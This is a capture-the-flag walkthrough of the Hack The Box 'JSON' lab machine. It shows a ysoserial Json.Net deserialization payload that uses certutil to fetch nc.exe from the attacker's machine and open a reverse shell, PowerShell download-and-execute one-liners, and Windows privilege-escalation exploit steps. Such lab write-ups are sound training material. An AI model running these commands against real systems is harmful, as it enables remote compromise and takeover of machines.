Hack The Box: JSON Walkthrough
130n@calvinlai.com
Author:
@27 Nov 2019
The game cannot be completed without the support of our friends of CTF Playgroup Hong Kong & Macau
Get the user.txt and root.txt
Target machine: 10.10.10.158
Attacking (Hacker) machine: 10.10.14.18
The target machine IP is 10.10.10.158. Get a basic understanding the available services of the target machine using nmap aggressive scanning to all available ports.
0.1) Quick Pre-searching
nmap -p- 10.10.10.158
0.2) Details Analysis
nmap -sV -p 21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,49158 -A -oN nmap-htb-json-details.txt 10.10.10.158
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Enumeration strategies
Nikto -- no vulnerability can be abused to bypass authentication.
Using dirb
Using gobuster
No hidden files/folders found for the exploitation.
It does not allow anonymous login
Visit the web page
Using Json for the authorisation
Index.html
After several try if was found that the login credentials is admin/admin
eyJJZCI6MSwiVXNlck5hbWUiOiJhZG…Sb2wiOiJBZG1pbmlzdHJhdG9yIn0=
{
"Id": 1,
"UserName": "admin",
"Password": "21232f297a57a5a743894a0e4a801fc3",
"Name": "User Admin HTB",
"Rol": "Administrator"
}
Login to the website and replace the token with the generated
As the name implies that it should be related to the JSON attack. Try the ysoserial to prepare the exploit payload for the OAuth2 token.
Download the master-release-29.zip and unzip the file
Switch off the window defender
Check how to save the file at target windows environment
ysoserial.exe -f Json.Net -g WindowsIdentity -o base64 -c "certutil.exe -urlcache -split -f "http://10.10.15.158:8888/nc.exe" "C:\windows\system32\spool\drivers\color\nc.exe"&"C:\windows\system32\spool\drivers\color\nc.exe" 10.10.15.158 1234 -e cmd.exe"
ew0KICAgICAgICAgICAgICAgICAgICAnJHR5cGUnOiAnU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OScsDQogICAgICAgICAgICAgICAgICAgICdTeXN0ZW0uU2VjdXJpdHkuQ2xhaW1zSWRlbnRpdHkuYm9vdHN0cmFwQ29udGV4dCc6ICdBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUVsVGVYTjBaVzBzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNUJRRUFBQUNFQVZONWMzUmxiUzVEYjJ4c1pXTjBhVzl1Y3k1SFpXNWxjbWxqTGxOdmNuUmxaRk5sZEdBeFcxdFRlWE4wWlcwdVUzUnlhVzVuTENCdGMyTnZjbXhwWWl3Z1ZtVnljMmx2YmowMExqQXVNQzR3TENCRGRXeDBkWEpsUFc1bGRYUnlZV3dzSUZCMVlteHBZMHRsZVZSdmEyVnVQV0kzTjJFMVl6VTJNVGt6TkdVd09EbGRYUVFBQUFBRlEyOTFiblFJUTI5dGNHRnlaWElIVm1WeWMybHZiZ1ZKZEdWdGN3QURBQVlJalFGVGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1RGIyMXdZWEpwYzI5dVEyOXRjR0Z5WlhKZ01WdGJVM2x6ZEdWdExsTjBjbWx1Wnl3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBJQWdBQUFBSUFBQUFKQXdBQUFBSUFBQUFKQkFBQUFBUURBQUFBalFGVGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1RGIyMXdZWEpwYzI5dVEyOXRjR0Z5WlhKZ01WdGJVM2x6ZEdWdExsTjBjbWx1Wnl3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBCQUFBQUMxOWpiMjF3WVhKcGMyOXVBeUpUZVhOMFpXMHVSR1ZzWldkaGRHVlRaWEpwWVd4cGVtRjBhVzl1U0c5c1pHVnlDUVVBQUFBUkJBQUFBQUlBQUFBR0JnQUFBTDRCTDJNZ1kyVnlkSFYwYVd3dVpYaGxJQzExY214allXTm9aU0F0YzNCc2FYUWdMV1lnYUhSMGNEb3ZMekV3TGpFd0xqRTFMakUxT0RvNE9EZzRMMjVqTG1WNFpTQkRPbHgzYVc1a2IzZHpYSE41YzNSbGJUTXlYSE53YjI5c1hHUnlhWFpsY25OY1kyOXNiM0pjYm1NdVpYaGxKa002WEhkcGJtUnZkM05jYzNsemRHVnRNekpjYzNCdmIyeGNaSEpwZG1WeWMxeGpiMnh2Y2x4dVl5NWxlR1VnTVRBdU1UQXVNVFV1TVRVNElERXlNelFnTFdVZ1kyMWtMbVY0WlFZSEFBQUFBMk50WkFRRkFBQUFJbE41YzNSbGJTNUVaV3hsWjJGMFpWTmxjbWxoYkdsNllYUnBiMjVJYjJ4a1pYSURBQUFBQ0VSbGJHVm5ZWFJsQjIxbGRHaHZaREFIYldWMGFHOWtNUU1EQXpCVGVYTjBaVzB1UkdWc1pXZGhkR1ZUWlhKcFlXeHBlbUYwYVc5dVNHOXNaR1Z5SzBSbGJHVm5ZWFJsUlc1MGNua3ZVM2x6ZEdWdExsSmxabXhsWTNScGIyNHVUV1Z0WW1WeVNXNW1iMU5sY21saGJHbDZZWFJwYjI1SWIyeGtaWEl2VTNsemRHVnRMbEpsWm14bFkzUnBiMjR1VFdWdFltVnlTVzVtYjFObGNtbGhiR2w2WVhScGIyNUliMnhrWlhJSkNBQUFBQWtKQUFBQUNRb0FBQUFFQ0FBQUFEQlRlWE4wWlcwdVJHVnNaV2RoZEdWVFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUswUmxiR1ZuWVhSbFJXNTBjbmtIQUFBQUJIUjVjR1VJWVhOelpXMWliSGtHZEdGeVoyVjBFblJoY21kbGRGUjVjR1ZCYzNObGJXSnNlUTUwWVhKblpYUlVlWEJsVG1GdFpRcHRaWFJvYjJST1lXMWxEV1JsYkdWbllYUmxSVzUwY25rQkFRSUJBUUVETUZONWMzUmxiUzVFWld4bFoyRjBaVk5sY21saGJHbDZZWFJwYjI1SWIyeGtaWElyUkdWc1pXZGhkR1ZGYm5SeWVRWUxBQUFBc0FKVGVYTjBaVzB1Um5WdVkyQXpXMXRUZVhOMFpXMHVVM1J5YVc1bkxDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkTEZ0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZExGdFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTXVVSEp2WTJWemN5d2dVM2x6ZEdWdExDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpjM1lUVmpOVFl4T1RNMFpUQTRPVjFkQmd3QUFBQkxiWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1Q2dZTkFBQUFTVk41YzNSbGJTd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGtHRGdBQUFCcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTXVVSEp2WTJWemN3WVBBQUFBQlZOMFlYSjBDUkFBQUFBRUNRQUFBQzlUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVOWlcxaVpYSkpibVp2VTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2djQUFBQUVUbUZ0WlF4QmMzTmxiV0pzZVU1aGJXVUpRMnhoYzNOT1lXMWxDVk5wWjI1aGRIVnlaUXBUYVdkdVlYUjFjbVV5Q2sxbGJXSmxjbFI1Y0dVUVIyVnVaWEpwWTBGeVozVnRaVzUwY3dFQkFRRUJBQU1JRFZONWMzUmxiUzVVZVhCbFcxMEpEd0FBQUFrTkFBQUFDUTRBQUFBR0ZBQUFBRDVUZVhOMFpXMHVSR2xoWjI1dmMzUnBZM011VUhKdlkyVnpjeUJUZEdGeWRDaFRlWE4wWlcwdVUzUnlhVzVuTENCVGVYTjBaVzB1VTNSeWFXNW5LUVlWQUFBQVBsTjVjM1JsYlM1RWFXRm5ibTl6ZEdsamN5NVFjbTlqWlhOeklGTjBZWEowS0ZONWMzUmxiUzVUZEhKcGJtY3NJRk41YzNSbGJTNVRkSEpwYm1jcENBQUFBQW9CQ2dBQUFBa0FBQUFHRmdBQUFBZERiMjF3WVhKbENRd0FBQUFHR0FBQUFBMVRlWE4wWlcwdVUzUnlhVzVuQmhrQUFBQXJTVzUwTXpJZ1EyOXRjR0Z5WlNoVGVYTjBaVzB1VTNSeWFXNW5MQ0JUZVhOMFpXMHVVM1J5YVc1bktRWWFBQUFBTWxONWMzUmxiUzVKYm5Rek1pQkRiMjF3WVhKbEtGTjVjM1JsYlM1VGRISnBibWNzSUZONWMzUmxiUzVUZEhKcGJtY3BDQUFBQUFvQkVBQUFBQWdBQUFBR0d3QUFBSEZUZVhOMFpXMHVRMjl0Y0dGeWFYTnZibUF4VzF0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZFhRa01BQUFBQ2drTUFBQUFDUmdBQUFBSkZnQUFBQW9MJw0KICAgICAgICAgICAgICAgIH0=
C) Prepare the netcat and http server for download the file from target server
Preparing the nc.exe for download
3.1) Login the website and exploit to get the low privilege access
Update the OAuth2 Cookie value and refresh
Get the Systeminfo and save for further evaluation
Searching the user.txt with the command dir user.txt /s /p
4.1) Sherlock to find the vulnerability of the system
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"
MS16-135 exploit-db
https://www.exploit-db.com/exploits/40823
Download the file to target
powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/ASLRSideChannelAttack.exe' -OutFile 'C:\windows\system32\spool\drivers\color\ASLRSideChannelAttack.exe'"
Execute the ASLRSideChannelAttack.exe, it did not work.
4.2) Using Windows-Exploit-Suggester to find the vulnerability of the system
Using the Windows
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Save the systeminfo to the file and run the python script to evaluate the system CVE
It was found that the system have the serval possible CVE
Random selected the MS16-098 to exploit, download the exploitable execution file at the exploit-db
Ysoserial
https://github.com/pwntester/ysoserial.net
Sherlock
https://github.com/rasta-mouse/Sherlock/blob/master/Sherlock.ps1
Windows-Exploit-Suggester
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://medium.com/soulsecteam/optimum-10-10-10-8-hackthebox-29f8d58da88f